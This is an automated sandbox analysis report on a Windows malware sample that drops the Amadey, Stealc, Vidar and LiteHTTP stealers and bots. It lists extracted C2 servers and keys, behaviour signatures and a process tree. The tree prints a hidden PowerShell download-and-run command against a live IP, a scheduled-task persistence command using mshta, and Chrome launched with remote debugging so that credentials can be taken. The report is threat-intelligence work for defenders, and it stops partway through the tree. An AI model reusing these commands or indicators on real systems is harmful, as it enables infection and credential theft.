Overview

overview

10

Static

static

5

25060f1d81...80.exe

windows7-x64

10

25060f1d81...80.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06/03/2025, 03:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    25060f1d816bed062dce485e4210e7beb6d42795806b8fa1470565ec6faf0980.exe

  • Size

    938KB

  • MD5

    a826f594b455a66045c839ff59c98013

  • SHA1

    4801c1a7386d92e10974d37b2def972a39717c08

  • SHA256

    25060f1d816bed062dce485e4210e7beb6d42795806b8fa1470565ec6faf0980

  • SHA512

    d4d6342d83013d75a7e0e822c4278fca837568126c300781b94becf4e77655abc95156d814499ef62aae2bf7fa1f366c3ee41d1ca48ea2719d0a94059612509d

  • SSDEEP

    24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8ayQF:NTvC/MTQYxsWR7ayQ

Score
10/10
amadeylitehttpstealcvidar092155ir7amtraff1botcredential_accessdefense_evasiondiscoveryexecutionpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

traff1

Attributes
  • url_path

    /gtthfbsb2h.php

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 6 IoCs
    stealer
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
    defense_evasion
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 24 IoCs
  • Uses browser remote debugging 2 TTPs 20 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 50 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 15 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 5 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\25060f1d816bed062dce485e4210e7beb6d42795806b8fa1470565ec6faf0980.exe
    "C:\Users\Admin\AppData\Local\Temp\25060f1d816bed062dce485e4210e7beb6d42795806b8fa1470565ec6faf0980.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3020
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn YXBLEmaJEmy /tr "mshta C:\Users\Admin\AppData\Local\Temp\yM8MZFemX.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn YXBLEmaJEmy /tr "mshta C:\Users\Admin\AppData\Local\Temp\yM8MZFemX.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2696
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\yM8MZFemX.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZY9YPD94FQB302VQVEDV5MQQWTYST5K4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Users\Admin\AppData\Local\TempZY9YPD94FQB302VQVEDV5MQQWTYST5K4.EXE
          "C:\Users\Admin\AppData\Local\TempZY9YPD94FQB302VQVEDV5MQQWTYST5K4.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2888
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2852
            • C:\Users\Admin\AppData\Local\Temp\10109990101\rXOl0pp.exe
              "C:\Users\Admin\AppData\Local\Temp\10109990101\rXOl0pp.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1308
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                7⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:684
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7659758,0x7fef7659768,0x7fef7659778
                  8⤵
                    PID:3036
                  • C:\Windows\system32\ctfmon.exe
                    ctfmon.exe
                    8⤵
                      PID:1712
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1172 --field-trial-handle=1308,i,4620654855505076112,7294614101827843852,131072 /prefetch:2
                      8⤵
                        PID:1856
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1308,i,4620654855505076112,7294614101827843852,131072 /prefetch:8
                        8⤵
                          PID:2348
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1308,i,4620654855505076112,7294614101827843852,131072 /prefetch:8
                          8⤵
                            PID:752
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2188 --field-trial-handle=1308,i,4620654855505076112,7294614101827843852,131072 /prefetch:1
                            8⤵
                            • Uses browser remote debugging
                            PID:1596
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2000 --field-trial-handle=1308,i,4620654855505076112,7294614101827843852,131072 /prefetch:1
                            8⤵
                            • Uses browser remote debugging
                            PID:2588
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2524 --field-trial-handle=1308,i,4620654855505076112,7294614101827843852,131072 /prefetch:1
                            8⤵
                            • Uses browser remote debugging
                            PID:2796
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1372 --field-trial-handle=1308,i,4620654855505076112,7294614101827843852,131072 /prefetch:2
                            8⤵
                              PID:3020
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                            7⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:2016
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7509758,0x7fef7509768,0x7fef7509778
                              8⤵
                                PID:2056
                              • C:\Windows\system32\ctfmon.exe
                                ctfmon.exe
                                8⤵
                                  PID:2116
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1196 --field-trial-handle=1388,i,8309473440326285441,17760724274474890603,131072 /prefetch:2
                                  8⤵
                                    PID:2120
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1544 --field-trial-handle=1388,i,8309473440326285441,17760724274474890603,131072 /prefetch:8
                                    8⤵
                                      PID:2428
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1388,i,8309473440326285441,17760724274474890603,131072 /prefetch:8
                                      8⤵
                                        PID:1376
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2184 --field-trial-handle=1388,i,8309473440326285441,17760724274474890603,131072 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:2608
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2456 --field-trial-handle=1388,i,8309473440326285441,17760724274474890603,131072 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:1808
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2516 --field-trial-handle=1388,i,8309473440326285441,17760724274474890603,131072 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:392
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1400 --field-trial-handle=1388,i,8309473440326285441,17760724274474890603,131072 /prefetch:2
                                        8⤵
                                          PID:1368
                                    • C:\Users\Admin\AppData\Local\Temp\10110000101\ILqcVeT.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10110000101\ILqcVeT.exe"
                                      6⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Downloads MZ/PE file
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Loads dropped DLL
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Checks processor information in registry
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2304
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                        7⤵
                                        • Uses browser remote debugging
                                        • Enumerates system info in registry
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        PID:1640
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7659758,0x7fef7659768,0x7fef7659778
                                          8⤵
                                            PID:2368
                                          • C:\Windows\system32\ctfmon.exe
                                            ctfmon.exe
                                            8⤵
                                              PID:1656
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1128 --field-trial-handle=1224,i,769790261712748222,5679496898589215151,131072 /prefetch:2
                                              8⤵
                                                PID:1476
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1224,i,769790261712748222,5679496898589215151,131072 /prefetch:8
                                                8⤵
                                                  PID:1784
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1224,i,769790261712748222,5679496898589215151,131072 /prefetch:8
                                                  8⤵
                                                    PID:748
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2416 --field-trial-handle=1224,i,769790261712748222,5679496898589215151,131072 /prefetch:1
                                                    8⤵
                                                    • Uses browser remote debugging
                                                    PID:1744
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2696 --field-trial-handle=1224,i,769790261712748222,5679496898589215151,131072 /prefetch:1
                                                    8⤵
                                                    • Uses browser remote debugging
                                                    PID:1892
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2716 --field-trial-handle=1224,i,769790261712748222,5679496898589215151,131072 /prefetch:1
                                                    8⤵
                                                    • Uses browser remote debugging
                                                    PID:2864
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1456 --field-trial-handle=1224,i,769790261712748222,5679496898589215151,131072 /prefetch:2
                                                    8⤵
                                                      PID:2404
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                    7⤵
                                                    • Uses browser remote debugging
                                                    • Enumerates system info in registry
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:2528
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7659758,0x7fef7659768,0x7fef7659778
                                                      8⤵
                                                        PID:920
                                                      • C:\Windows\system32\ctfmon.exe
                                                        ctfmon.exe
                                                        8⤵
                                                          PID:876
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1100,i,4181854037909487740,3683136568845190694,131072 /prefetch:2
                                                          8⤵
                                                            PID:1604
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1312 --field-trial-handle=1100,i,4181854037909487740,3683136568845190694,131072 /prefetch:8
                                                            8⤵
                                                              PID:668
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1364 --field-trial-handle=1100,i,4181854037909487740,3683136568845190694,131072 /prefetch:8
                                                              8⤵
                                                                PID:1376
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2272 --field-trial-handle=1100,i,4181854037909487740,3683136568845190694,131072 /prefetch:1
                                                                8⤵
                                                                • Uses browser remote debugging
                                                                PID:2436
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2584 --field-trial-handle=1100,i,4181854037909487740,3683136568845190694,131072 /prefetch:1
                                                                8⤵
                                                                • Uses browser remote debugging
                                                                PID:1844
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2592 --field-trial-handle=1100,i,4181854037909487740,3683136568845190694,131072 /prefetch:1
                                                                8⤵
                                                                • Uses browser remote debugging
                                                                PID:1864
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1884 --field-trial-handle=1100,i,4181854037909487740,3683136568845190694,131072 /prefetch:2
                                                                8⤵
                                                                  PID:2972
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                7⤵
                                                                • Uses browser remote debugging
                                                                • Enumerates system info in registry
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:1308
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
